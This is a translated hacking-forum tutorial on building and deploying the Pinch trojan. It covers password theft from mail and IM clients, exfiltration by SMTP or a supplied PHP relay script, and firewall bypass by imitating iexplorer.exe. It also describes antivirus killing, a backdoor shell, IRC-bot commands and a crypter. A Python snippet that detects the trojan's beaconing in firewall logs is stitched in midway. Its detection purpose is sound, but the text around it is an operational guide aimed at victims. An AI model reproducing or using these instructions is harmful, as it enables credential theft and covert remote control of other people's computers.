Cracking mail accounts, using BrutusAET2


THE MATERIAL IS PUBLISHED FOR INFORMATIONAL PURPOSES ONLY. THE AUTHOR BEARS NO RESPONSIBILITY


------------------------------------------------------------------
Part 1. Old, but useful. For Pinch 1

***********************
Instruction for Pinch 1.0
***********************

=====
Intro
=====

Please do not be surprised that I decided to write such an article (an article for lamerzzz). The fact is that on my forum (http://forum.web-hack.ru) about once every three days a thread is created like "How do I properly configure and use Pinch?", "How do I use Pinch?" etc.

============
Capabilities
============

This trojan became quite widespread in 2003/2004, thanks to its ability to steal a large number of passwords (ICQ99b-2003a/Lite/ICQ2003Pro, Miranda IM, Trillian ICQ & AIM, &RQ, The Bat!, Outlook Express, Outlook, IE autocomplete & protected sites & ftp (9x/ME/2000/XP), FAR Manager (ftp), Windows/Total Commander (ftp), RAS (9x/Me/2k/xp supported)), its small size, its open source, and the ease of building a trojan for a specific task. The trojan has the following features:

- Sends the configuration of the victim's computer: OS, RAM, CPU, HDD, logged-in user, host name, IP
- Keyboard spy (Key-log)
- Remote console
- Bypass Firewall
- Sending all passwords to E-mail using an SMTP server
- Encryption of stolen passwords sent by mail
- Trojan auto-removal after launch
- HTML / Text reports
- File size is approximately 10Kb
- Modular system
- And much more...

The trojan was written by coban2k (http://www.cobans.net), a fairly well-known person in the world of ICQ hacking. Due to problems with the hosting provider over storing the trojan on its server, the author was forced to remove this creation from his site. Unfortunately, almost all antiviruses detect this trojan, so it can only be planted on a victim who has no antivirus.

================
Package contents
================

The archive with the trojan (pinch_1.0.zip) contains the following folders and files:

\PinchBuilder.exe - wizard for creating the trojan
\Parser.exe - program for decrypting the encrypted emails with passwords
\Readme.txt - no comments
\Pinch\ - the main folder with the asm sources of the trojan and the compiler
\Sources\ - other sources
\TB! 2 Plugin (Auto-parser)\ - folder with a plug-in for The Bat! 2 which decodes the encrypted emails with passwords arriving in your mailbox
\Sources\Script\ - PHP script through which passwords are sent when the corresponding option is selected at compile time (read further)

====================
Compiling the trojan
====================

The kit includes a special wizard (PinchBuilder.exe), which builds the trojan to your requirements and compiles it directly on your computer. The program has two main tabs: Compile and Decrypt. The first is used to create the trojan, the second to decrypt passwords (in fact, this tab duplicates Parser.exe). Below them are three sub-tabs: SMTP, HTTP and FILE. They set the method by which the passwords are delivered. Let's look at each in more detail:

========
SMTP
========

In the Server field, enter the address (hostname/IP) of the SMTP server. If you entered the server's domain name, click Resolve so that the domain is converted into an IP address. Next, in the From and To fields, specify your own mailbox. The Send test message button sends a test mail through the settings you specified. I strongly recommend that you use it. If the letter does not arrive, there is some problem with sending (an enabled firewall, a bad SMTP server, you did not click Resolve, etc.).

I want to note that recently most ISPs are switching to a scheme whereby their customers can send mail ONLY through the ISP's own SMTP server. In such cases, I recommend sending the letters via HTTP.

====
HTTP
====

Upload the file \Sources\Script\view.php to a server that supports PHP scripts and allows the mail() function. Then, in the URL field, specify the path to this script (for example, http://www.xss.ru/pinch.php). In the Subject field, specify the subject line with which the messages will arrive. The Status check str field must contain the string that the script outputs after it loads. In the script that ships with the trojan this value is _ret_ok_1:

<script language="JavaScript">
window.status = "_ret_ok_1";
</script>

If the trojan does not receive this value, it will try to send the message through this script every minute until it gets the string from the Status check str field. I recommend that you use not the script from the standard distribution, but the one written by me:

<html><body>
<?php
// Author: Terabyte (http://www.web-hack.ru)
$email = $_POST['a'];
$subject = $_POST['b'];
$msg = $_POST['c'];
if (isset($email) and isset($subject) and isset($msg)) {
    mail($email, $subject, $msg, "From: $email");
}
?>
<script language="JavaScript">
window.status = "_ret_ok_1";
</script>
</body></html>

It does almost the same thing, but is written more competently. A huge advantage of this method of sending passwords is that it lets them pass the firewall. How is this achieved? Here is an excerpt from Outpost's log when the password was sent through the script on my site:

Process name: iexplorer.exe
Protocol: HTTP
Remote address: www.web-hack.ru

I think everyone who is not in the dark understood =) Among the other pluses I can highlight: the ability to write the encrypted letters to your site rather than sending them to a mailbox; the ability to change the mailbox to which the passwords are sent, in case it gets deleted; and, when mass-mailing the trojan, that passwords can be sent even from those providers where access to all SMTP servers except their own is blocked.
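From the defender's side, the two behaviours this section describes (retrying the upload every minute until the status string appears, and showing up in the firewall as a browser-named process) are both visible in a host firewall log. The following is an added example, not from the article or the Pinch kit: it parses constructed records in the layout of the Outpost excerpt above (the timestamp prefix, the one-record-per-line form and the placeholder hostnames are assumptions) and flags browser-name lookalikes and fixed-interval reconnects.

```python
import re
from datetime import datetime
# Constructed sample (placeholder hosts) in the article's Outpost field layout plus an assumed timestamp
SAMPLE_LOG = """\
2004-03-01 12:00:03 Process name: iexplorer.exe Protocol: HTTP Remote address: relay.example.net
2004-03-01 12:01:04 Process name: iexplorer.exe Protocol: HTTP Remote address: relay.example.net
2004-03-01 12:02:03 Process name: iexplorer.exe Protocol: HTTP Remote address: relay.example.net
2004-03-01 12:00:30 Process name: iexplore.exe Protocol: HTTP Remote address: www.example.org
"""
RECORD = re.compile(r"^(\S+ \S+) Process name: (\S+) Protocol: (\S+) Remote address: (\S+)$")
LEGIT_BROWSERS = ("iexplore.exe", "firefox.exe", "opera.exe")

def edit_distance(a, b):
    # Plain Levenshtein distance (insert / delete / substitute cost 1 each)
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike_of(name):
    # Legitimate browser name this process name imitates (1-2 edits away), else None
    name = name.lower()
    hits = [l for l in LEGIT_BROWSERS if name != l and edit_distance(name, l) <= 2]
    return hits[0] if hits else None

def parse_log(text):
    records = []
    for m in filter(None, map(RECORD.match, text.splitlines())):
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        records.append((ts, m.group(2), m.group(3), m.group(4)))
    return records

def find_suspicious(text, period=60, tolerance=5):
    # (a) browser-name lookalikes; (b) the same process/host pair reconnecting at a
    # fixed interval, which is what a retry-every-minute upload loop looks like
    findings, per_pair = [], {}
    for ts, proc, _proto, host in parse_log(text):
        legit = lookalike_of(proc)
        if legit:
            findings.append(("lookalike", proc, legit, host))
        per_pair.setdefault((proc.lower(), host), []).append(ts)
    for (proc, host), times in per_pair.items():
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if len(gaps) >= 2 and all(abs(g - period) <= tolerance for g in gaps):
            findings.append(("beacon", proc, host, round(sum(gaps) / len(gaps))))
    return findings
```

The real browser process is iexplore.exe; a name one edit away is the cheapest tell, and the minute-spaced reconnects to one host are the retry loop described above.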

====
FILE
====

This tab specifies the file in which all passwords will be saved. In the Path field, write the path to the file (for example, C:\password.txt).

================
Compiler Options
================

Everything here is self-explanatory; you just tick the boxes where you need them. Pay attention to the Add Icon field. It specifies the path to the icon with which the compiled trojan will be displayed. I want to note that on my system (Windows XP) I did not manage to compile the trojan with this option enabled and had to disable it.

In the Protocol field, specify the method by which the passwords will be sent (SMTP/HTTP/FILE). Then click the Compile button to compile the trojan, which will be saved to the main folder of the wizard that created it.

===================
Decrypting passwords
===================

Suppose you managed to plant this trojan on a lamer and passwords from the victim's machine arrived in your mailbox. The thing is, passwords are encrypted when sent and must first be decrypted (unless you have the special plug-in for The Bat! described above). Copy the text with the encrypted passwords to the clipboard, open Parser.exe (or the Decrypt tab in PinchBuilder.exe) and click the Process Data item in the context menu (or just press Alt+C). The program will then show you all the data stolen from the victim in a convenient form, which you can save or print.

==========
Conclusion
==========

I want to warn you that by using this trojan you immediately fall under Article 273 of the Criminal Code of the Russian Federation and can be severely punished ;-) I (the author of the article) bear no responsibility for the harm that may be caused to anyone after reading my article.


----------------------------------------

Part 2. Instruction for Pinch 2.58

A small article on the basic configuration of Pinch. Do not judge strictly, but criticize as much as you like. An article on setting up Pinch 2.58.

I think nobody has problems with the crack, since there is a detailed help and even a video attached. I want to show you how to set up the trojan in the Builder:

SMTP Properties
Server (enter, in your case, smtp.mail.ru), then you must press Resolve so that it is converted into an IP (by the way, all of this must be done with the Internet connected)

Port - leave it as it is

Protocol - select how the report will be delivered: via SMTP, via HTTP (through PHP), or FILE (saved on the computer). The buttons with the same names (SMTP, HTTP, FILE) configure the protocols, but in this case we are interested in SMTP and have already configured it.

The TestSend button sends a test message to the mailbox.

The PWD tab - steals passwords from the listed programs. If the ENABLE PWD checkbox is cleared, the report will not contain passwords.
Do not send old report - do not send old reports.
The Encrypt and Packing checkboxes are interconnected. FSG, UPX, MEW - selection of the packing method.

RUN tab - select the autorun methods. I think you'll figure it out. Register as .... standard, DLL, Undelate Service. Move to the folder ..... either you specify one or choose one of the system folders. The Values column on the right I did not touch, and to be honest I only vaguely understand what it is for. Bottom right - bypass Windows Firewall (SP2) - bypasses the system firewall in SP2 (as far as I know, the mechanism of this item is that it starts as iexplorer.exe)

The SPY tab - some additional reports - it did not work for me. The screen spy item - taking screenshots, but again it did not work for me (a screenshot was sent, but it was empty)

NET tab - I did not use it. It is intended for:
1. Opening any port on the infected computer, and accordingly getting access to it (I strongly advise against using it if you don't encrypt it; if you get caught, you can guess what will happen ...)
2. Downloader - specify a direct link to a file that should be downloaded and started (imagine what traffic costs your enemy will incur if he pays for traffic ......))))
3. AutoUpdate - auto update - after finishing its work the trojan downloads a copy of itself, then self-destructs, and on the next system boot the new copy is launched (this is for reliability, so that it can't be found).

The BD (backdoor) tab - opens a console shell on the selected port; control via telnet (telnet.exe) or alternative programs. (I have not tried it myself)

The ECT tab - binding with any file, as well as setting the icon ... You can also make a message pop up ... But something does not work ...

The KILL tab - killing any process (you can try to kill the antivirus), for example "spidernt" - then the DrWeb monitor will turn off (I warn you, I have not tried it yet, but I will)

IE tab - set your homepage in the browser. Adding a page to Favorites ....

The WORM tab - what is this, I don't know ... .....

IRC-bot tab - access to the computer via IRC:
.login - authorization
.die - shutting down the bot
.download - download a file from a URL
.httpd - open file access via HTTP on a specific port
.killthread - terminate a specific task
.proxy - open a socks4 proxy on the selected port with the selected id
.raw - send raw text to this IRC server
.remove - removal
.restart - restart
.run - run commands
.scan - scan IP addresses for certain open ports
.shell - open a shell on a specific port (not in 95/98/ME)
.status - show version, IP, start date
.threads - show active tasks
.update - self-update the bot from a special URL
.visit - visit the selected URL hidden
.url - visit the selected URL openly
.link - add to favorites
.sp - set your homepage
.msg - messagebox

That seems to be everything .... You press COMPILE and the result appears in the folder with the builder ...

GOOD LUCK !!!!!

PS All of this, as usual, is written for informational purposes, and the author bears no responsibility for the consequences ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Crypt features:
A polymorphic cryptor is used
Bypasses KIS and Outpost (including the latest versions)
Self-removal
Size reduction (a normal Pinch shrinks by 3-6 KB, the zupacha loader by 60-80 KB)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~